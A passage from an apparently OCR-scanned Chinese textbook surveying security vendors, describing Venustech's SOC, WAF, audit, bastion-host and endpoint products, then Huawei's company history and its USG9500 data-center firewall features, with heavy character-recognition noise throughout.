威胁 所 在 ;丰富 报表 展现 ,提供 基于 时 间 、 地 址 、 事件 等 多 重 参数 信息 的 分 析 报表 ,结合 历 
史 分 析 数 据 , 可 清晰 展现 安全 建设 发 展 趋势 ,协助 考量 网 络 安全 建设 水 平 。 


. 安全 管理 平台 (SOC) 


泰 合 信息 安全 运营 中 心 (Security Operation Center, SOC) 系 统 是 一 个 以 IT 资产 为 
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基础 ,以 业务 信息 系统 为 核心 ,以 客户 体验 为 指引 ,从 监控 .审计 ` 风险. 运 维 四 个 维度 建 
立 起 来 的 一 套 可 度量 的 统一 业务 支撑 平台 ,使 得 各 种 用 户 能 够 对 业务 信息 系统 进行 可 用 
性 与 性 能 的 监控 ;配置 与 事件 的 分 析 审 计 预 警 ;风险 与 态势 的 度量 与 评估 ;安全 运 维 流程 
的 标准 化 、 例 行 化 .常态 化 ,最 终 实现 业务 信息 系统 的 持续 安全 运营 。 

泰 合 信息 安全 运营 中 心 系统 基于 开放 式 的 软件 平台 设计 架构 ,由 多 个 功能 模块 组 
成 ,用 户 可 以 自由 选择 搭配 ,后 续 还 能 够 无 颖 升级 。 泰 合 信息 安全 运营 中 心 系统 软件 平 
台 如 图 4.4 所 示 。 


EN 
A 监控 视图 审计 视图 风险 视图 运 维 视图 
漏洞 扫描 
弱点 信息 采集 宏观 态势 分 析 - 
预警 管理 
网 络 设备 》 安全 配置 信息 采集 弱点 与 风险 分 析 
外 
| 一 [日志 信息 采集 | 上 [安全 事件 分 析 “| 上 | 计划 管理 加 
全 
| 二 | 性 能 信息 采集 配置 符合 性 分 析 
资产 信息 采集 性能 与 可 用 性 分 析 遇 友 半 
资产 管理 业务 管理 报表 管理 


资产 库 | | 业务 库 | | 事件 库 | | 漏洞 库 | | 策略 库 | | 规划 库 


外 
系统 自身 管理 | | 权限 管理 | | 级 联 管理 知识 管理 知识 库 四 
响应 /控制 了 


4.4 泰 合 信息 安全 运营 中 心 系统 软件 平台 


系统 的 主要 功能 包括 : 

1) 面向 业务 的 统一 安全 管理 

系统 内 置业 务 建 模 工具 ,用 户 可 以 构建 业务 拓扑 ,反映 业务 支撑 系统 的 资产 构成 ,并 
自动 构建 业务 健康 指标 体系 ,从 业务 的 性 能 与 可 用 性 、 业 务 的 脆弱 性 和 业务 的 威胁 三 个 
维度 计算 业务 的 健康 度 ,协助 用 户 从 业务 的 角度 去 分 析 业 务 可 用 性 、 业 务 安全 事件 和 业 
务 告警 。 

2) 全 面 的 日 志 采 集 

可 以 通过 多 种 方式 来 收集 设备 和 业务 系统 的 日 志 , 例 如 Syslog、SNMP Trap、FTP、 
OPSEC LEA NETBIOS.ODBC、WMI、Shell 脚本 、Web Service 等 。 
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3) 智能 化 安全 事件 关联 分 析 

借助 先进 的 智能 事件 关联 分 析 引 擎 ,系统 能 够 实时 不 间断 地 对 所 有 范式 化 后 的 日 志 
流 进行 安全 事件 关联 分 析 。 系 统 为 分 析 师 提供 了 三 种 事件 关联 分 析 技 术 , 分 别 是 : 基于 
规则 的 关联 分 析 、 基 于 情境 的 关联 分 析 和 基于 行为 的 关联 分 析 , 并 提供 了 丰富 的 可 视 化 
安全 事件 分 析 视 图 ,充分 提升 分 析 效 率 。 

4) 全 面 的 脆弱 性 管理 

系统 实现 与 天 镜 漏 扫 系统 的 实时 高 效 联 动 , 内 置 配 置 核查 功能 ,从 技术 和 管理 两 个 
维度 进行 全 面 的 资产 和 业务 脆弱 性 管控 。 

5) 主动 化 的 预警 管理 

用 户 可 以 通过 预警 管理 功能 发 布 内 部 及 外 部 的 早期 预警 信息 ,并 与 网 络 中 的 IP 资 
产 进行 关联 ,分 析出 可 能 受 影响 的 资产 ,提前 让 用 户 了 解 业 务 系统 可 能 遭受 的 攻击 和 洪 
在 的 安全 隐患 。 系 统 支持 内 部 预警 和 外 部 预警 ;预警 类 型 包括 安全 通告 .攻击 预警 .漏洞 
预警 和 病毒 预警 等 ;预警 信息 包括 预备 预警 .正式 预警 和 归档 预警 三 个 状态 。 

6) 基于 风险 矩阵 的 量化 安全 风险 评估 

系统 参照 GB/T 20984-2007 信息 安全 风险 评估 规范 .ISO 27005:2008 信息 安全 风险 
管理 ,以 及 OWASP 威胁 建 模 项 目 中 风险 计算 模型 的 要 求 ,设计 了 一 套 实 用 化 的 风险 计 
算 模型 ,实现 了 量化 的 安全 风险 估算 和 评估 。 

7) 指标 化 宏观 态势 感知 

系统 是 国内 首 个 具备 态势 宏观 分 析 能 力 的 安全 管理 平台 。 针 对 系统 收集 到 的 海量 
安全 事件 ,系统 借助 地 址 信 分 析 、 热 点 分 析 、 威 胁 态 势 分 析 、.KPI 分 析 等 数据 挖掘 技术 , 帮 
助 管理 员 从 宏观 层面 把 握 整 体 安全 态势 ,对 重大 威胁 进行 识别 .定位 .预测 和 跟踪 。 

8) 多 样 的 安全 响应 管理 

系统 具备 完善 的 响应 管理 功能 ,能 够 根据 用 户 设 定 的 各 种 触发 条 件 , 通 过 多 种 方式 
(例如 ,邮件 短信、 声音 .SNMP Trap 等 ) 通 知 用 户 ,并 触发 响应 处 理 流程 ,直至 跟踪 到 问 
题 处 理 完 毕 , 从 而 实现 安全 事件 的 闭环 管理 。 

9) 丰富 灵活 的 报表 报告 

出 具 报 表 报 告 是 安全 管理 平台 的 重要 用 途 。 系 统 内 置 了 丰富 的 报表 模板 ,包括 统计 
报表 、 明 细 报 表 、 综 合 审 计 报告 ,审计 人 员 可 以 根据 需要 生成 不 同 的 报表 。 系 统 内 置 报表 
生成 调度 器 ,可 以 定时 自动 生成 日 报 、 周 报 、 月 报 、 季 报 、 年 报 ,并 支持 以 邮件 等 方式 自动 
投递 ,支持 以 PDF 、Excel、Word 等 格式 导出 ,支持 打印 。 系 统 还 内 置 了 一 套 报表 编辑 器 ， 
用 户 可 以 自行 设计 报表 ,包括 报表 的 页 面 版 式 、 统 计 内 容 、 显 示 风 格 等 。 

10) 流量 管理 

除了 采集 各 类 安全 事件 ,系统 还 能 够 采集 形 如 NetFlow 的 流量 日 志 。 针 对 采集 来 的 
NetFlow 流量 日 志 的 分 析 ,系统 能 够 建立 网 络 流量 模型 ,通过 泰 合 特有 的 基于 流量 基线 
的 分 析 算 法 ,发 现 网 络 异 常 行为 。 

11) 知识 管理 

系统 具有 国内 最 完善 的 安全 管理 知识 库 系 统 , 内 容 涵盖 安全 事件 库 .安全 策略 库 、 安 
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全 公告 库 .预警 信息 库 .漏洞 库 .关联 规则 库 、 处 理 预案 库 .案例 库 .报表 库 等 ,并 提供 定期 
或 者 不 定期 的 知识 库 升 级 服务 。 

12) 用 户 管理 

系统 采用 三 权 分 立 的 管理 体制 ,默认 设置 了 用 户 管理 系统 管理 员 、 安 全 运营 中 心 管 
理 员 ,审计 管理 员 分 别 进行 管理 。 系 统 用 户 管 理 采用 基于 角色 的 访问 控制 策略 , 即 依 据 
对 系统 中 角色 行为 来 限制 对 资源 的 访问 。 

13) 自身 系统 管理 

实现 了 系统 自身 安全 及 维护 管理 。 主 要 包括 组 织 管理 、 系 统 数 据 库 及 功能 组 件 运 行 
状态 监控 .日志 维护 及 其 他 一 些 与 系统 本 身 相 关 的 运行 维护 的 管理 和 配置 功能 。 

14) 一 体 化 的 安全 管控 界面 

系统 提供 了 强大 的 一 体 化 安全 管控 功能 界面 ,为 不 同 层级 的 用 户 提供 了 多 视角 、 多 
层次 的 管理 视图 。 


4. Web 应 用 防火 墙 (Web Application Firewall, WAF) 


天 清 Web 应 用 安全 网 关 , 是 启明 星 展 公司 自行 研制 开发 的 新 一 代 Web 应 用 防火 墙 
(WAF) 与 应 用 交付 类 网 络 安全 产品 ,主要 针对 Web 服务 器 进行 第 7 层 流量 分 析 ,防护 以 
Web 应 用 程序 漏洞 为 目标 的 攻击 ,并 针对 Web 应 用 访问 进行 各 方面 优化 ,以 提高 Web 
或 网 络 协议 应 用 的 可 用 性 .性 能 和 安全 性 ,确保 业务 应 用 能 够 快速 .安全 .可 靠 地 交付 。 
天 清 WAG 应 用 了 一 套 HTTP 会 话 规则 集 , 这 些 规则 涵盖 诸如 SQL 注入 以 及 XSS 等 常 
见 的 Web 攻击 。 同 时 通过 自 定义 规则 ,识别 并 阻止 更 多 攻击 。 解 决 诸如 防火 墙 UTM 
等 传统 设备 束手无策 的 Web 系统 安全 问题 。 其 大 致 功能 如 图 4.5 所 示 。 


由 


ET Web 抽奖。 
Web 恶 意 代码 防护 SS 攻击 咏 扩 2 
。 网 页 挂 马 防护 基于 
: | 。 基 于 URL 的 流量 控制 
WebShell 防 护 \ 。 Web 应 用 加 速 
。 多 服务 器 负载 均衡 


Web 非 授权 访问 防护 
。CSRF 攻 击 防护 。 L 的 访问 控制 
。cookie 算 改 防护 。 协议 合 规 
* 网 站 盗 链 防护 * 敏感 信息 泄露 防护 
。 文 件 上 传 下 载 控制 
。Web 表 单 关 键 字 过 滤 


4.5 天 清 Web 应 用 安全 网 关 功 能 图 解 
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5. 安全 审计 


天 表 网 络 安全 审计 系统 (业务 网 审计 ) 简 称 天 表 审 计 系统 ,是 针对 业务 环境 下 的 网 络 
操作 行为 进行 细 粒 度 审计 的 合 规 性 管理 系统 。 它 通过 对 业务 人 员 访 问 系 统 的 行为 进行 
解析 、 分 析 、 记 录 、 汇 报 , 以 帮助 用 户 事前 规划 预防 、 事 中 实时 监视 、 违 规 行为 响应 、 事 后 合 
规 报告 .事故 追踪 溯源 ,加 强 内 外 部 网 络 行为 监管 ,促进 核心 资产 (数据 库 、 服 务 器 、 网 络 
设备 等 ) 的 正常 运营 。 对 于 业务 系统 的 核心 一 一 数据 库 的 审计 能 力 表现 尤其 出 色 , 是 国 
内 审计 数据 库 类 型 最 全 ,解析 粒度 最 细 的 审计 产品 。 同 时 ,天 表 网 络 安全 审计 系统 支持 
扩展 无 线 安全 模块 ,可 实现 对 各 种 无 线 网 络 连接 信息 的 审计 记录 ,包括 正常 无 线 连 接 行 
为 ,非法 设备 或 终端 的 违规 无 线 访问 及 涉 密 网 中 的 非法 无 线 访 问 等 ,提供 有 线 、 无 线 网 络 
安全 行为 审计 整体 解决 方案 。 


6. 运 维 安全 管控 (堡垒 机 ) 


启明 星 展 运 维 安全 管控 系统 (OSM) ,是 启明 星 展 综合 内 控 系 列 产品 之 一 。OSM 利 
用 在 运营 商行 业 的 业务 积累 和 已 有 技术 积累 ,是 针对 业务 环境 下 的 用 户 运 维 操作 进行 控 
制 和 审计 的 合 规 性 管控 系统 。 它 通过 对 自然 人 身份 以 及 资源 .资源 账号 的 集中 管理 建立 
“自然 人 一 资源 一 资源 账号 ?对 应 关系 ,实现 自然 人 对 资源 的 统一 授权 ,同时 ,对 授权 人 员 
的 运 维 操作 进行 记录 、 分 析 、 展 现 ,以 帮助 内 控 工 作 事 前 规划 预防 . 事 中 实时 监控 、 违 规 行 
为 响应 .事后 合 规 报 告 事故 追踪 回放 ,加 强 内 部 业务 操作 行为 监管 .避免 核心 资产 (服务 
器 .网络 设 备 .安全 设备 等 ) 损 失 、 保 障 业务 系统 的 正常 运营 。OSM 能 够 对 运 维 人 员 维 护 
过 程 的 全 面 跟踪 .控制 记录、 回放 ;支持 细 粒 度 配 置 运 维 人 员 的 访问 权限 ,实时 阻 断 违 
规 ,越权 的 访问 行为 ,同时 提供 维护 人 员 操作 的 全 过 程 的 记录 与 报告 ;系统 支持 对 加 密 与 
图 形 协 议 进行 审计 ,消除 了 传统 行为 审计 系统 中 的 审计 盲点 ,是 IT 系统 内 部 控制 最 有 力 
的 支撑 平台 之 一 。 

其 功能 特点 如 下 : 

1) 运 维 协议 支持 广 , 易 扩展 ,充分 满足 运 维 需 要 

产品 实现 对 多 种 运 维 协议 或 运 维 客户 端的 支持 ,充分 满足 运 维 需 要 ,包括 字符 协议 、 
图 形 协议 ,文件 传输 协议 .HTTP(S) 应 用 数据库 访 问 和 Pcanywhere、Radmin 等 常用 运 
维 客户 端 。 通 过 配置 应 用 发 布 ,还 可 以 灵活 扩展 其 他 运 维 协议 或 工具 。 

2) 多 种 资源 访问 方式 ,适应 不 同人 员 使 用 习惯 

产品 支持 多 种 目标 资源 访问 方式 ,使 用 界面 友好 ,能 够 最 大 程度 适应 不 同 用 户 的 使 
用 习惯 。 

3) 细 粒 度 访问 授权 ,有 效 控制 运 维 风险 

产品 可 根据 用 户 .用 户 组 .访问 主机 、 系 统 账号 .访问 方式 等 内 容 设置 细 粒 度 访问 策 
略 , 同 时 支持 指令 黑白 名 单 . 时 间 黑 白 名单 IP 黑白 名 单 。 通 过 集中 统一 的 访问 控制 和 细 
粒度 的 命令 级 授权 策略 ,确保 “权限 最 小 化 原则 ”, 有 效 规 避 运 维 操作 风险 。 

4) 审计 实名 制 ,为 事后 取证 提供 证 据 

以 用 户 身份 为 依据 ,真实 完整 的 记录 每 个 用 户 的 所 有 操作 行为 ;支持 实时 监控 和 仿 
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真 回 放 ; 支 持 在 监控 过 程 中 手工 切断 高 危 操 作 。 


7. 终端 安全 


天 殉 内 网 安全 风险 管理 与 审计 系统 (简称 天 瑰 ) ,紧密 围绕 “ 合 规 ”, 以 内 网 终端 计算 
机 为 管理 对 象 ,通过 “终端 准 入 控制 ,终端 安全 控制 桌面 合 规 管理 ,终端 泄密 控制 和 终端 
审计 ”五 维 化 管理 ,全 面 提升 内 网 安全 防护 能 力 和 合 规 管理 水 平 , 帮 助 用 户 构 建 起 安全 可 
信 的 合 规 内 网 。 天 殉 引 领 了 内 网 安全 管理 模式 的 新 变革 ,改变 了 “被 动 的 \ 以 事件 驱动 为 
特征 ”的 传统 内 网 安全 管理 模式 ,开创 了 “主动 防御 、 合 规 管理 ”为 目标 的 内 网 安全 管理 新 
时 代 。 其 包含 多 层 准 人 方案 ,网 关 准 入 .Web 准 入 、802. 1 准 入 、Eou 准 入 、 客 户 端 准 入 
等 。 并 且 提 供 便携 的 自动 式 客户 端 部 署 过 程 ,使 15 分 钟 部 署 上 千 点 客户 端 成 为 可 能 。 
还 具有 终端 安全 修复 、 终 端 访问 控制 .桌面 管理 、 安 全 审计 、 移 动 存储 管理 一 体 化 管理 、 简 
单 易 维 护 等 功能 特性 。 其 功能 模块 如 图 4.6 所 示 。 


4.6 ”天 殊 内 网 安全 风险 管理 与 审计 系统 功能 模块 


42 主 为 技术 有 限 公 司 


华为 技术 有 限 公 司 是 一 家 生产 销售 通信 设备 的 民营 通信 科技 公司 ,总 部 位 于 中 国 广 
东 省 深圳 市 龙岗 区 坂田 华为 基地 。 华 为 的 产品 主要 涉及 通信 网 络 中 的 交换 网 络 ,传输 网 
络 、 无 线 及 有 线 固定 接 入 网 络 和 数据 通信 和 网络 及 无 线 终端 产品 ,为 世界 各 地 通信 运营 商 
及 专业 网 络 拥有 者 提供 硬件 设备 .软件 .服务 和 解决 方案 。 华 为 的 产品 和 解决 方案 已 经 
应 用 于 全 球 170 多 个 国家 ,服务 全 球 运营 商 50 强 中 的 45 家 及 全 球 1/3 的 人 口 。 


421 基本 情况 


华为 于 1987 年 在 中 国 深圳 正式 注册 成 立 。 过 去 20 多 年 ,华为 抓 住 中 国 改革 开放 和 
ICT 行业 高 速 发 展 带 来 的 历史 机 遇 , 坚 持 以 客户 为 中 心 , 以 奋斗 者 为 本 ,基于 客户 需求 持 
续 创 新 ,赢得 了 客户 的 尊重 和 信赖 ,从 一 家 立足 于 中 国 深圳 特区 ,初始 资本 只 有 21 000 元 
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的 民营 企业 ,稳健 成 长 为 年 销售 规模 近 2400 亿 元 的 世界 500 强 公司 。 如 今 , 华 为 的 电信 
网 络 设备 IT 设备 和 解决 方案 以 及 智能 终端 已 应 用 于 全 球 170 多 个 国家 和 地 区 。 华 为 为 
电信 和 运营 商 、 企 业 和 消费 者 等 提供 有 竞争 力 的 端 到 端 ICT 解决 方案 和 服务 ,对 电信 基础 
网 络 . 云 数据 中 心 和 智能 终端 等 领域 持续 进行 研发 投入 ,以 客户 需求 和 前 沿 技术 驱动 的 
创新 ,使 公司 始终 处 于 行业 前 沿 ,引领 行业 的 发 展 。 华 为 每 年 将 销售 收入 的 10% 以 上 投 
入 研发 ,在 近 15 万 华为 人 中 ,超过 45% 的 员工 从 事 创 新 、 研 究 与 开发 。 华 为 在 170 多 个 
标准 组 织 和 开源 组 织 中 担任 核心 职位 ,已 累计 获得 专利 授权 36511 件 。2014 年 (财富 ) 世 
界 500 强 中 华为 排行 全 球 第 285 位 ,与 上 年 相 比 上 升 三 十 位 。2014 年 上 半年 度 经 营业 
绩 , 数 据 显 示 ,2014 年 上 半年 ,华为 实现 销售 收入 1358 亿 元 ,同比 增长 19% ;营业 利润 率 
18.3%。2014 年 10 月 9 日 ,Interbrand 在 纽约 发 布 的 “最 佳 全 球 品牌 ”排行 榜 中 ,华为 以 
排名 94 的 成 绩 出 现在 榜 单 之 中 ,这 也 是 中 国 大 陆 首 个 进入 Interbrand top100 榜 单 的 企 
业 公 司 。2015 年 , 评 为 新 浪 科 技 2014 年 度 风云 榜 年 度 杰 出 企业 。 


422 发 展 历程 


1987 年 ,创立 于 深圳 ,成 为 一 家 生产 用 户 交 换 机 (PBX) 的 香港 公司 的 销售 代理 。 

1989 年 ,自主 开发 PBX。1994 推出 C&C08 数字 程控 交换 机 。 

1990 年 ,开始 自主 研发 面向 酒店 与 小 企业 的 PBX 技术 并 进行 商用 。 

1992 年 ,开始 研发 并 推出 农村 数字 交换 解决 方案 。 

1995 年 ,销售 额 达 15 亿 元 ,主要 来 自 中 国 农 村 市 场 。 成 立 知 识 产 权 部 。 成 立 北 京 研 
发 中 心 ,并 于 2003 年 通过 了 CMM4 级 认证 。 

1996 年 推出 综合 业务 接 入 网 和 光 网 络 SDH 设备 。 与 香港 和 记 黄 埔 签订 合同 ,为 其 
提供 固定 网 络 解决 方案 。 成 立 上 海 研发 中 心 ,并 于 2004 年 通过 了 CMM5 级 认证 。 

1997 年 推出 无 线 GSM 解决 方案 ,于 1998 年 将 市 场 拓展 到 中 国 主要 城市 。 与 Texas 
Instruments、 Motorola、IBM、 Intel、Agere Systems、Sun Microsystems、Altera、 
Qualcomm Infineon 和 Microsoft, 成 立 了 联合 研发 实验 室 。 

1998 年 产品 数字 微 蜂 帘 服 务 器 控制 交换 机 获得 了 专利 。 成 立 南京 研发 中 心 , 并 于 
2003 年 6 月 通过 了 CMM4 级 认证 。 

1999 年 在 印度 班加罗尔 设立 研发 中 心 。 该 研发 中 心 分 别 于 2001 年 和 2003 年 获得 
CMM4 级 认证 .CMM5 级 认证 。 成 为 中 国 移动 全 国 CAMEL Phase II 智能 网 的 主要 供应 
商 , 该 网 络 是 当时 世界 上 最 大 和 最 先进 的 智能 网 络 。 

2000 年 在 瑞典 首都 斯 德 哥 尔 摩 设立 研发 中 心 。 合 同 销售 额 超过 26. 5 亿美 元 ,其 中 
海外 销售 额 超过 1 亿美 元 。 在 美国 硅谷 和 达拉斯 设立 研发 中 心 。 

2001 年 以 7.5 亿美 元 的 价格 将 非 核心 子 公司 Avansys 卖 给 爱 默 生 ,在 美国 设立 四 个 
研发 中 心 并 且 加 入 国际 电信 联盟 (ITU) , 除 此 之 外 10 Gbps SDH 系统 开始 在 德国 的 柏林 
进行 商用 。 根 据 RHK 的 统计 ,华为 的 光纤 系列 产品 稳 居 亚太 地 区 市 场 份额 的 第 1 名 。 

2002 年 海外 市 场 销售 额 达 5. 52 亿美 元 。 尽 管 2001 年 到 2002 年 间 , 全 球 电信 基础 
设施 的 投资 下 降 了 50% ,华为 的 国际 销售 额 还 是 增长 了 68% ,从 2001 年 的 3. 28 亿美 元 
上 升 到 2002 年 的 5. 52 亿美 元 。 华 为 通过 了 UL 的 TL9000 质量 管理 系统 认证 。 为 中 国 


178 


人 kx 


移动 部 署 世界 上 第 一 个 移动 模式 WLAN。 

2003 年 与 3Com 合作 成 立 合资 公司 ,专注 于 企业 数据 网 络 解决 方案 的 研究 。 同 年 还 
发 生 了 Cisco Systems 指控 华为 侵犯 部 分 Cisco 技术 专利 。 但 是 ,Cisco 最 终 撤回 了 诉状 ， 
双方 解决 了 所 有 的 专利 纠纷 ,并 承认 华为 没有 侵权 行为 。 

2004 年 与 西门 子 成 立 合资 企业 ,针对 中 国 市 场 开 发 TD-SCDMA 移动 通信 技术 。 

2005 年 ,海外 合同 销售 额 首 次 超过 国内 合同 销售 额 。 华 为 一 步 一 步 逐 渐 实 现 了 全 球 
化 ,海外 业务 不 断 扩展 ,遍布 全 球 许多 国家 与 地 区 。 同 年 与 沃达丰 签署 4 全球 框架 协议 》， 
正式 成 为 沃达丰 优选 通信 设备 供应 商 。 

2006 年 与 摩托 罗拉 合作 在 上 海 成 立 联合 研发 中 心 , 开 发 UMTS 技术 。 同 年 华为 移 
动 软 交 换 用 户 数 突破 一 亿 。 作 为 全 球 移动 软 交 换 市 场 的 领导 者 ,华为 移动 软 交换 出 货 量 
居 全 球 第 一 。 

2007 年 与 赛 门 铁 克 合 作成 立 合资 公司 ,致力 于 提供 网 络 安全 与 存储 产品 和 解决 方 
案 , 与 Global Marine 合作 成 立 合资 公司 ,提供 海 缆 端 到 端 网 络 解决 方案 。 

2008 年 被 商业 周刊 评 为 全 球 十 大 最 有 影响 力 的 公司 。 同 年 根据 Informa 的 咨询 报 
告 , 华 为 在 移动 设备 市 场 领域 排名 全 球 第 三 。 

2009 年 无 线 接 人 市 场 份额 跻身 全 球 第 二 。 同 年 华为 率先 发 布 从 路 由 器 到 传输 系统 
的 端 到 端 100G 解决 方案 ,还 获得 IEEE 标准 组 织 2009 年 度 杰 出 公司 贡献 奖 , 与 此 同时 
移动 宽带 产品 全 球 累计 发 货 量 超过 2000 万 部 ,根据 ABI 的 数据 ,市 场 份额 位 列 全 球 
第 一 。 

2010 年 华为 超越 了 诺基亚 西门 子 和 阿尔 卡特 朗讯 ,成 为 全 球 仅 次 于 爱立信 的 第 二 大 
通信 设备 制造 商 。 并 加 入 联合 国 世界 宽带 委员 会 。 同 年 7 月 8 日 ,美国 知名 杂志 《财富 》 
公布 了 2010 年 (财富 ) 世 界 500 强 企业 最 新 排名 ,华为 首次 人 围 。 继 联想 集团 之 后 ,华为 
成 为 闻 入 世界 500 强 的 第 二 家 中 国民 营 科技 企业 ,也 是 500 强 中 唯一 一 家 未 上 市 公司 。 

2011 年 华为 与 赛 门 铁 克 公司 宣布 双方 已 就 华为 收购 华 赛 49% 的 股权 达成 协议 ,在 
云 计算 大 会 暨 合 作 伙伴 大 会 上 成 立 IT 产品 线 , 预 计 云 计算 投入 一 万 人 。 

2013 年 华为 在 “2013 炫 动 ICT 中 国 行 ? 巡 展 也 暨 华为 视讯 20 周年 之 际 推出 了 新 一 
代 视 频 会 议 产品 ,包括 TE30 视讯 终端 和 具备 1080P60 全 适 配 能 力 的 96 系列 MCU , 华 
为 力 推 视讯 平民 化 ,让 视频 告别 宽带 特 供 。 

2014 年 2 月 25 日 ,在 世界 移动 通信 大 会 上 ,华为 创新 地 推出 全 球 最 小 的 运营 级 路 由 
器 一 一 原子 路 由 器 (Atom Router) 。 这 款 原 子路 由 器 仅 手指 大 小 ,可 在 现 网 任意 节点 、 任 
意 设 备 部 署 , 零 改造 现 网 即 可 实现 IP 网 络 的 可 视 化 、 可 管理 ,提供 实时 的 每 用 户 、 每 业务 
高 精度 性 能 检测 ,助力 传统 网 络 实现 网 络 增值 。 


423 主要 产品 
1. 数据 中 心 防火 墙 


USG9500 是 华为 公司 面向 云 服 务 提 供 商 .大 型 数据 中 心 和 大 型 企业 园区 网 络 推出 的 
新 一 代 工 级 多 合 一 数据 中 心 防火 墙 。USG9500 提供 高 达 工 级 的 处 理性 能 和 99. 999% 
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可 靠 性 ,集成 NAT、VPN IPS、 虚 拟 化 .业务 感知 等 多 种 安全 特性 ,帮助 企业 构建 面向 云 
计算 时 代 的 数据 中 心 边界 安全 防护 ,降低 机 房 空间 投资 和 每 Mbps 总 体 拥有 成 本 。 大 型 
数据 中 心 边界 防护 场景 如 图 4.7 所 示 。 


USG9500 USG9500 


T77737 
We al 数据 库 应 用 服务 器 其 他 


图 4.7 大 型 数据 中 心 边界 防护 场景 


USG9500 系列 目前 提供 USG9520、USG9560、USG9580 三 种 产品 形态 。 

其 主要 产品 特性 如 下 : 

1) 访问 控制 一 一 基于 ACTUAL 的 六 维 一 体 化 防护 

传统 防火 墙 主要 通过 端口 和 IP 进行 访问 控制 ,下 一 代 防 火 墙 的 核心 功能 依然 是 访 
问 控 制 , 但 USG9500 在 控制 的 维度 和 精细 程度 上 都 有 很 大 的 提高 ,可 以 从 应 用 、 用 户 、 内 
容 .时间 威胁、 位 置 6 个 维度 进行 一 体 化 的 管控 和 防御 。 内 容 层 的 防御 与 应 用 识别 深度 
结合 ,一 体 化 处 理 。 例 如 ,识别 出 Oracle 的 流量 ,进而 有 针对 性 地 进行 对 应 的 入 侵 防御 ， 
效率 更 高 , 误 报 更 少 。 

(1) 基于 应 用 的 访问 控制 。 运 用 多 种 技术 手段 ,准确 识别 包括 移动 应 用 及 Web 应 用 
内 的 6000 十 应 用 协议 及 应 用 的 不 同 功 能 ,继而 进行 访问 控制 和 业务 加 速 。 例 如 ,区 分 微 
信 的 语音 和 文字 后 采取 不 同 的 控制 策略 。 

(2) 基于 用 户 的 访问 控制 。 通 过 Radius、LDAP、AD 等 8 种 用 户 识 别 手段 集成 已 有 
用 户 认证 系统 简化 管理 。 基 于 用 户 进行 访问 控制 .QoS 管理 和 深度 防护 。 

(3) 基于 位 置 的 访问 控制 。 与 全 球 位 置信 息 结合 ,识别 流量 发 起 的 位 置信 息 ;掌控 应 
用 和 攻击 发 起 的 位 置 ,第 一 时 间 发 现 网 络 异 常情 况 。 _ 根 握 位 置信 息 可 以 实现 对 不 同 区 域 
访问 流量 的 差异 化 控制 。 支 持 根据 IP 自 定义 位 置 。 

2) NGFW 特性 一 一 一 台 顶 多 台 设 备 , 大 幅 降 低 TCO 

越 来 越 多 的 信息 资产 连接 到 了 互联 网 上 ,网 络 攻 击 和 信息 窃取 形成 巨大 的 产业 链 ， 
这 对 下 一 代 防 火 墙 的 防护 范围 提出 了 更 高 要 求 。USG9500 具备 全 面 的 防护 功能 , 集 传统 
防火 墙 \VPN、 人 侵 防御 、 防 病毒 .数据 防 泄露 .带宽 管理 、 上 网 行为 管理 等 功能 于 一 身 ,一 
机 多 能 ,简化 部 署 ,提高 管理 效率 。 

(1) 入 侵 防护 (IPS): 超过 5000 种 漏洞 特征 的 攻击 检测 和 防御 。 支 持 Web 攻击 识 
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别 和 防护 ,如 路 站 脚本 攻击 .SQL 注入 攻击 等 。 

(2) 防 病毒 (AV) : 高 性 能 病毒 引擎 ,可 防护 500 万 种 以 上 的 病毒 和 木马 ,病毒 特征 
库 每 日 更 新 。 

(3) 数据 防 泄露 : 对 传输 的 文件 和 内 容 进行 识别 过 滤 。 可 识别 120 十 种 常见 文件 类 
型 ,防止 通过 修改 后 级 名 的 病毒 攻击 。 能 对 Word、Excel、PPT、PDF、RAR 等 30 十 文件 
进行 还 原 和 内 容 过 滤 ,防止 企业 关键 信息 通过 文件 泄露 。 

(4) SSL 解密 : 作为 代理 ,可 对 SSL 加 密 流量 进行 应 用 层 安全 防护 ,如 ,IPS、AV 、 数 
据 防 泄露 `.URL 过 滤 等 。 

(5) Anti-DDoS; 可 以 识别 和 防范 SYN flood、UDP flood 等 10 十 种 DDoS 攻击 ,识别 
500 多 万 种 病毒 。 

(6) 上 网 行为 管理 : 采用 基于 云 的 URL 分 类 过 滤 ,预定 义 的 URL 分 类 库 已 超过 
8500 万 ,阻止 员工 访问 恶意 网 站 带 来 的 威胁 。 并 可 对 员工 的 发 帖 .FTP 等 上 网 行为 进行 
控制 。 可 对 上 网 记录 进行 审计 。 

(7) 安全 互联 : 丰富 的 VPN 特性 ,确保 企业 总 部 和 分 支 间 高 可 靠 安 全 互联 。 支 持 
IPSec VPN .SSL VPN.L2TP VPN .MPLS VPN GRE 等 。 

(8) QoS 管理 : 基于 应 用 灵活 的 管理 流量 带宽 的 上 限 和 下 限 , 可 基于 应 用 进行 策略 
路 由 和 QoS 标签 着 色 。 支 持 对 URL 分 类 的 QoS 标签 着 色 ,例如 ,优先 转发 对 财经 类 网 
站 的 访问 。 

(9) 负载 均衡 : 支持 服务 器 间 的 负载 均衡 。 对 多 出 口 场景 ,可 按照 链 路 质量 、 链 路 带 
宽 比 例 、 链 路 权重 基于 应 用 进行 负载 均衡 。 

3)“NP 十 多 核 十 分 布 式 ”架构 一 一 性 能 线性 倍增 ,突破 传统 性 能 瓶颈 

USG9500 采用 核心 路 由 器 硬件 平台 ,提供 模块 化 部 件 ,接口 模块 基于 双 NP 处 理 器 ， 
保证 接口 流量 线 速 转 发 ;业务 处 理 模块 (SPU) 基 于 多 核 多 线程 架构 ,每 颗 CPU 都 有 应 用 
加 速 引擎 ,结合 华为 对 海量 会 话 的 并 发 处 理 优 化 技术 ,可 确保 NAT、VPN 等 多 种 业务 高 
速 并 行 处 理 , 处 理 能 力 不 受 CPU 处 理性 能 的 限制 。LPU 和 SPU 各 司 其 职 ,通过 部 署 多 
块 SPU ,实现 整 机 性 能 线性 倍增 ,为 保护 高 速 网 络 环境 提供 无 与 伦比 的 扩展 性 和 灵活 性 ， 
确保 用 户 前 期 低 成 本 投入 ,后 期 顺利 扩容 。 

由 于 采用 了 革命 性 的 系统 架构 ,USG9500 在 防火 墙 吞 吐 量 、. 最 大 并 发 连接 数 等 主要 
指标 上 是 目前 业界 性 能 最 高 的 安全 网 关 。 由 于 USG9500 采用 了 专 有 的 分 流 技术 , 整 机 
性 能 随 SPU 的 配置 数量 线性 倍增 。USG9500 最 大 防火 墙 整 机 吞吐 量 达 到 业界 领先 的 
